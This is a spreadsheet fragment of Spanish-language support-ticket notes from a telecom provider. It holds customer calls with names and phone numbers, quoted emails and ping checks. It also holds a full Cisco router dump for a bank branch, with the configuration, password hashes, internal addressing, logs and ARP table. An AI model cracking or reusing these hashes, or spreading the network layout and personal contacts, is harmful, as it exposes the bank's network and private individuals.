    <t>SE LLAMA NUEVAMENTE A OSCAR CASTILLO SIN TENER RESPUESTA
58261583</t>
  </si>
  <si>
    <t>SE LLAMA A OSCAR ESTUARDO CASTILLO INDICA QUE ESTAN PREPARANDO MATERIALES Y EQUIPOS PÁRA ATENDER LA FALLA, QUEDA DE DAR MAS INDICACIONES EN UNOS MINUTOS.</t>
  </si>
  <si>
    <t>F4581837</t>
  </si>
  <si>
    <t>CLIENTE INGRID MORATAYA VALIDO EL SERVICIO EN PUNTO REMOTO CON PERSONAL TÉCNICO
2001875673
COLA:
NOMBRE: A: 58261265
NÚMERO: 58261265
DURACIÓN: 0:10:55
ESTADO: CONECTADA
DETALLES: 58261265
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 29/05/2022 08:56:06</t>
  </si>
  <si>
    <t>***--- CL AGRADECE LA ACTUALIZACIÓN E INDICA SU NUMEO DE CONTACTO DE SER NECESARIO HABLAR CON EL --***
DE: WALTER ANIBAL REYES [MAILTO:WALTER.REYES@SOMOSCMI.COM]
ENVIADO EL: DOMINGO, 29 DE MAYO DE 2022 03:34
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; DIEGO PABLO AJIN HERNANDEZ &lt;DIEGO.AJIN@CLARO.COM.GT&gt;
CC: HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: G280 - ENLACE CLARO - CON ID 770600166T
BUEN DÍA, EDY GRACIAS  POR EL APOYO ESTOY AL PENDIENTE Y ME PUEDEN LOCALIZAR AL 45787011.
SALUDOS,</t>
  </si>
  <si>
    <t>F4581932</t>
  </si>
  <si>
    <t>--- LUIS ZAMORA 54177797 (CLIENTE), INDICA QUE AUN HARAN PRUEBAS, SOLICITA QUE SE LE LLAME A LAS 12:30 HRS. PARA CONFIRMAR. ...</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE LUIS ZAMORA 54177797 PERO ENVÍA A BUZÓN, SE INTENTARA EN UNOS INSTANTES
2001878767
2001878716</t>
  </si>
  <si>
    <t>F4581933</t>
  </si>
  <si>
    <t>SE PROCEDE A VALIDAR A NIVEL DE ULTIMA MILLA PARA VALIDAR EL TEMA DE LA CAIDA A NIVEL DE ULTIMA MILLA  Y PODER RESTABLECER EL SERVICIO DESPUES SE VALIDARA LA PARTE DE  INESTAVILLIDAD ENTRE EL SW DE ACCES0</t>
  </si>
  <si>
    <t>SE VALIDA CON EL CLIENTE DONDE ENVIA CONTACTOS EL CLIENTE VIA CORREO SE VALIDA CON EL PERSNAL DE TURNO EN EL PUNTO REPMOTO INDICA QUE SE ENCUENTR AOPERATIVO Y SIN PERDAS DE PAQUETES INDICA QUE TUVO ICONVENIENTES HACE 3 DIAS PERO QUE AL DIA ESTA FUNCIONANDO CORRECTAMENTRE. SE PORCEDE CON CIERRE DE TICKT.
&lt;GNCYGTG2N2D4A05A15EIM10&gt;PING -C 1500 -S 1500 -M 30 -Q -VPN INNOVA_DATOS 10.255.                                                                                        170.45
  PING 10.255.170.45: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.255.170.45 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 22/33/86 MS</t>
  </si>
  <si>
    <t>JORGE HERNÁNDEZ/CLIENTE INDICA QUE ENLACE ESTÁ CAÍDO, PIDE SE VERIFIQUE DE NUEVO SERVICIO; TICKET ASOCIADO A FALLA MASIVA. SE ESCALA CON KEVYN FONSECA/TEAM LEADER PIDE SE APERTURE NUEVO TICKET PARA REVISIÓN.</t>
  </si>
  <si>
    <t>F4581950</t>
  </si>
  <si>
    <t>SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE VALIDA QUE ANIVEL DE LAN CLIENTE SE TUVO UN INCONVENINETE SE PROCEDE CON CIERRE.
ROUTER CPE ACTIVO HACE 1 DÍA.
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(4)M3, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2013 BY CISCO SYSTEMS, INC.
COMPILED TUE 26-FEB-13 02:11 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M16, RELEASE SOFTWARE (FC1)
CC_BANRURAL_GT_AGENCIA_0848 UPTIME IS 1 DAY, 13 HOURS, 48 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "FLASH0:C1900-UNIVERSALK9-MZ.SPA.152-4.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72781BB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72781BB
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_BANRURAL_GT_AGENCIA_0848#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4130 BYTES
!
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_AGENCIA_0848
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 4 EFGGPN07/DWJB.UGZOURJMJZHPAPLRUWH/NVNVXUK6.
!
NO AAA NEW-MODEL
!
IP CEF
!
!
!
!
!
!
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX172781BB
!
!
USERNAME GESTIONIP SECRET 4 J97D2KYDSNA1WFDCO/9OZ72YEJCXHSGT1W6FUL8O/O.
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.124.109 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/8902052T/_/
 BANDWIDTH 512
 NO IP ADDRESS
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/0.1
 DESCRIPTION WAN PRINCIPAL/_/8902052T/_/
 BANDWIDTH 512
 ENCAPSULATION DOT1Q 184
 IP ADDRESS 10.72.193.121 255.255.255.192
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION WAN REDUNDANTE/_/8902053T/_/
 BANDWIDTH 2048
 IP ADDRESS 10.72.193.175 255.255.255.192
 NO IP REDIRECTS
 NO IP UNREACHABLES
 NO IP PROXY-ARP
 RATE-LIMIT INPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE FASTETHERNET0/0/0
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET0/0/1
 DESCRIPTION LAN DEL CLIENTE
 NO IP ADDRESS
!
INTERFACE FASTETHERNET0/0/2
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET0/0/3
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 10.138.48.17 255.255.255.248 SECONDARY
 IP ADDRESS 10.168.48.126 255.255.255.0
 RATE-LIMIT INPUT 4096000 768000 1536000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 4096000 768000 1536000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
!
ROUTER OSPF 1
 ROUTER-ID 10.72.193.121
 AREA 164 NSSA
 REDISTRIBUTE CONNECTED SUBNETS ROUTE-MAP CONNECTED
 NETWORK 10.72.193.64 0.0.0.63 AREA 164
 NEIGHBOR 10.72.193.165
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.72.193.129 220
!
!
IP PREFIX-LIST CONNECTED SEQ 5 PERMIT 10.212.124.109/32
IP PREFIX-LIST CONNECTED SEQ 10 PERMIT 10.168.48.0/24
IP PREFIX-LIST CONNECTED SEQ 15 PERMIT 10.138.48.16/29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RIO SAN JUAN AGUACATAN HUEHUETENANG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848#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 2871 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 2871 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 2874 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
O-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:44:20.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:44:25.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:44:26.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:45:37.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:45:38.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:45:42.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:45:43.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:45:55.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:45:56.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:46:00.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:46:01.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:46:13.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:46:14.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:46:19.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:46:20.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:46:31.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:46:32.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:46:37.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:46:38.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:46:49.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:46:50.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:46:55.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:46:56.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:47:07.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:47:08.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:47:13.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:47:14.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:47:25.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:47:26.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:47:32.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:47:33.631 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:47:44.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:47:45.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:47:50.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:47:51.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:49:02.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:49:03.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:49:09.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:49:10.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:49:20.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:49:21.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:49:26.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:49:27.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:49:39.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:49:40.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:49:44.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:49:45.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:49:58.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:49:59.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:50:04.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:50:05.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:50:16.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:50:17.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:50:21.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:50:22.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:50:34.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:50:35.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:50:40.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:50:41.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:50:52.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:50:53.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:50:58.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:50:59.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:51:10.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:51:11.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:51:16.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:51:17.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:52:29.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:52:30.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 29 03:52:34.591 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 03:52:35.591 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 29 06:29:45.906 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.193.126 ON GIGABITETHERNET0/0.1 FROM INIT TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
*MAY 29 06:40:38.570 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.193.126 ON GIGABITETHERNET0/0.1 FROM INIT TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
*MAY 29 06:49:50.938 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.193.126 ON GIGABITETHERNET0/0.1 FROM INIT TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
*MAY 29 06:58:16.130 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.193.126 ON GIGABITETHERNET0/0.1 FROM INIT TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
*MAY 29 07:06:57.222 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.193.126 ON GIGABITETHERNET0/0.1 FROM INIT TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
CC_BANRURAL_GT_AGENCIA_0848#
SHOW CLOCK
*07:12:01.586 UTC SUN MAY 29 2022
CC_BANRURAL_GT_AGENCIA_0848#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.193.65            0   DC99.147A.A501  ARPA   GIGABITETHERNET0/0.1
INTERNET  10.72.193.91            4   C0FF.A821.F377  ARPA   GIGABITETHERNET0/0.1
INTERNET  10.72.193.93            4   3458.40C8.83D1  ARPA   GIGABITETHERNET0/0.1
INTERNET  10.72.193.94          234   00D0.D65D.88D8  ARPA   GIGABITETHERNET0/0.1
INTERNET  10.72.193.121           -   F872.EA4D.6240  ARPA   GIGABITETHERNET0/0.1
INTERNET  10.72.193.125           2   C0FF.A821.D3FF  ARPA   GIGABITETHERNET0/0.1
INTERNET  10.72.193.129           0   DC99.147A.A501  ARPA   GIGABITETHERNET0/1
INTERNET  10.72.193.175           -   F872.EA4D.6241  ARPA   GIGABITETHERNET0/1
INTERNET  10.138.48.17            -   F872.EA4D.6243  ARPA   VLAN1
INTERNET  10.138.48.22            0   F08E.DB17.A452  ARPA   VLAN1
INTERNET  10.168.48.126           -   F872.EA4D.6243  ARPA   VLAN1
CC_BANRURAL_GT_AGENCIA_0848#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/8902052T/_/
GI0/0.1                        UP             UP       WAN PRINCIPAL/_/8902052T/_/
GI0/1                          UP             UP       WAN REDUNDANTE/_/8902053T/_/
FA0/0/0                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA0/0/1                        UP             UP       LAN DEL CLIENTE
FA0/0/2                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA0/0/3                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_BANRURAL_GT_AGENCIA_0848#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         UNASSIGNED      YES NVRAM  UP                    UP
GIGABITETHERNET0/0.1       10.72.193.121   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         10.72.193.175   YES NVRAM  UP                    UP
FASTETHERNET0/0/0          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0/0/1          UNASSIGNED      YES UNSET  UP                    UP
FASTETHERNET0/0/2          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0/0/3          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
LOOPBACK5                  10.212.124.109  YES NVRAM  UP                    UP
VLAN1                      10.168.48.126   YES NVRAM  UP                    UP
CC_BANRURAL_GT_AGENCIA_0848#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN BANRURAL 10.72.193.175
  PING 10.72.193.175: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.193.175 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 44/47/53 MS
RUTA IP:
PE: 10.179.28.35
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.72.193.175
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.72.193.128/26  DIRECT  0    0             D   10.72.193.129   VLANIF2249</t>
  </si>
  <si>
    <t>F4581965</t>
  </si>
  <si>
    <t>SE LLAMA A SAUL DIAZ 72742051 Y SE LE INDICA QUE EL SERVICIO REPORTADO SE ENCUENTRA OPERATIVO SE SOLICITA EL ID CORRECTO DEL SERVICIO QUE REPORTA PERO QUE POR EL HORARIO NO TIENE EL ID A LA MANO SE PROCEDE CON CIERRE DE TICKET.</t>
  </si>
  <si>
    <t>F4581975</t>
  </si>
  <si>
    <t>SE VE ENLACE ACTIVO SE DETIENEN ESCALACIONES
&lt;HHERCRMPN1W1N01O01EIM1&gt;PING -C 1500 -M 10 -B -VPN DATOS_WALMART 10.201.11.17
  PING 10.201.11.17: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!